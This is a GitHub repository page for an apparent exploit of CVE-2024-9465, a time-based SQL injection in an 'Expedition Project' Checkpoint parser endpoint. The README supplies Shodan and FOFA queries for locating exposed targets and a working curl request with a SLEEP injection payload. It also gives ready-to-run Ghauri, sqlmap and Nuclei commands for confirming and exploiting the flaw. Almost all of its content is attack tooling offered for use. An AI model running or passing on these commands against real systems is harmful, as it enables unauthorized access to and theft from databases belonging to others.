Skip to content
/ CVE-2024-9465 Public

Checkpoint SQL Injection via Time-Based Attack (CVE-2024-9465)

0 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

mustafaakalin/CVE-2024-9465

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
CVE-2024-9465.py
CVE-2024-9465.py
 
 
CVE-2024-9465.yaml
CVE-2024-9465.yaml
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2024-9465

Checkpoint SQL Injection via Time-Based Attack (CVE-2024-9465)

SHODAN SEARCH

https://www.shodan.io/search?query=html%3A%22Expedition+Project%22

html:"Expedition Project"

FOFA SEARCH

https://en.fofa.info/
body="Expedition Project" || title="Expedition Project"

USAGE

python3 CVE-2024-9465.py -u https://domain.com

cURL command

curl -X POST "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "action=import&type=test&project=pandbRBAC&signatureid=1+AND+(SELECT+1234+FROM+(SELECT(SLEEP(10)))horizon3)" \
-w "Total Time: %{time_total}\n" \
-k

Ghauri Command

ghauri --url "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
--data "action=import&type=test&project=pandbRBAC&signatureid=1" \
--technique T \
--dbms mysql \
--time-sec 10 \
-p signatureid \
--threads 10

SQLMAP command

sqlmap -u "https://domain.com/bin/configurations/parsers/Checkpoint/CHECKPOINT.php" \
--data "action=import&type=test&project=pandbRBAC&signatureid=1" \
--dbms=mysql \
--level 5 --risk 3 \
--time-sec=10 \
--technique=T \
--tamper=space2comment \
--batch --random-agent -v 3

Nuclei command

nuclei -u https://domain.com -t CVE-2024-9465.yaml -v

About

Checkpoint SQL Injection via Time-Based Attack (CVE-2024-9465)

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages